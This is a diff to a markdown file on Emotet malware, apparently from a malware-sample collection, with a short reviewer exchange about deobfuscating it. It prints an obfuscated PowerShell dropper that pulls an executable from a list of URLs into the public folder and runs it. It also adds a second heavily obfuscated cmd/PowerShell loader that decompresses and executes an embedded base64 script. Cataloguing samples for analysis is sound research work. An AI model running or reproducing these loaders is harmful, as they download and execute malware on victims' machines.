Malwares/Emotet.md

```diff
@@ -29,6 +29,16 @@ powershell ( [RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marsha
 http://lecap-services .fr/wiB9s/?http://nikitinskysport .ru/R5ytZ/?http://beauty-tea .com/hB2JAMO/?http://zekiatagur .com/gCWu/?http://arkonziv .com/Site7_Pixelhobbies/iV1PKqL/.Split(?);$SDC = $env:public  \  $NSB  ('.exe');foreach($asfc in $ADCX){try{$
 YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&(Invoke-Item)($SDC);break;}catch{})
 ```
+2. Payload with base64 and compressed (deflate/inflate) data also reversed spelling
+```
+%windir%\SysWOW64\cmd.exe Cmd /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekOVNI '+'crf)(Dn'+'eoTda'+'ER.)'+'})'+'iI'+'cS'+'A::'+']Gn'+'IDoCNE'+'.txE'+'t'+'.mE'+'T'+'s'+'YS[ , '+'_Q8h'+' '+'(REDA'+'ErmAe'+'r'+'t'+'S.oi '+'TcEJBO-WEn {'+' tC'+'E'+'jBO'+'-hcAe'+'Ro'+'f '+'crf'+' )'+'s'+'SERp'+'M'+'O'+'CED'+'::'+']EdOm'+'NoIS'+'SErp'+'m'+'O'+'c.noiss'+'erPmoc'+'.Oi[, '+')'+'0kR'+'=='+'wf0gt'+'4jn'+'5w'+'plE'+'56'+'j'+'u'+'T6'+'l'+'U'+'y8Thm'+'dN'+'Rp'+'Y'+'bFvu'+'a'+'GcUFpNDv'+'i'+'S'+'aiRLaT3RXf5'+'R62j'+'22Tq'+'8'+'9'+'yO00xFYyxWaA'+'a'+'PAh/'+'+eeB'+'+'+'/PwGy7wuuEMUTe'+'JCm3c'+'7'+'dD'+'D'+'Nv'+'v0E6'+'ly'+'9'+'A'+'B'+'fdSW9'+'xBKUu'+'DeMT4'+'rPe6id'+'+'+'JMV'+'C2TkqV/f'+'x'+'b'+'a'+'Ky+'+'XLxam'+'q1'+'vrVSpZnJ+Z'+'x0HZ5X'+'N+WpMXQhxM5iSysve+L/J+yhlz'+'6Tt'+'VOy'+'g'+'Ahuy'+'KymQon8'+'J'+'cE7vWmI'+'Gm'+'vhI'+'siwMIrg'+'0'+'Ai'+'LMxX10'+'Vyjy'+'TnY'+'G'+'3E'+'wE'+'UCsEZ6yMT'+'sET'+'nT'+'4Jb'+'nj'+'w'+'ELS'+'5UEl2J'+'syPY9iggb2'+'84'+'aR'+'9bW'+'+Q'+'QN/'+'xtcw'+'J7W'+'++e'+'6b'+'C'+'ZcX'+'/QOmbOaruL'+'vV'+'uK9FG'+'UGBKISY'+'Y'+'QtENgqfNb'+'JIFa6hy/XI'+'FwI8TRBZ'+'P0'+'kR '+'(GNiRt'+'s46E'+'SABMorf:'+':]'+'T'+'REvn'+'OC'+'[]MaEr'+'tSy'+'roMe'+'m'+'.oi.METsys'+'['+' '+'(mAERtSE'+'tAlFe'+'D.'+'N'+'OisSErpM'+'o'+'c.Oi'+'.mETsys'+' Tc'+'EJ'+'B'+'O-'+'WEn ( '(( ()''nIOJ-]2,11,3[EmAN.)'*rDM*' eLbAirav-Teg(( ." ; [ARrAY]::ReveRSE( ( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue); [stRiNG]::jOIn( '' ,( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue )^|^& ( $veRbOsePrEFerENCe.TOsTRiNG()[1,3]+'x'-JOIn'')&& PowERsheLl SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) )"
```

Comment:
@tagnullde Do you have the deobfuscated command also?

Reply:
I can deobfuscate it for you in the next couple of hours. :+1: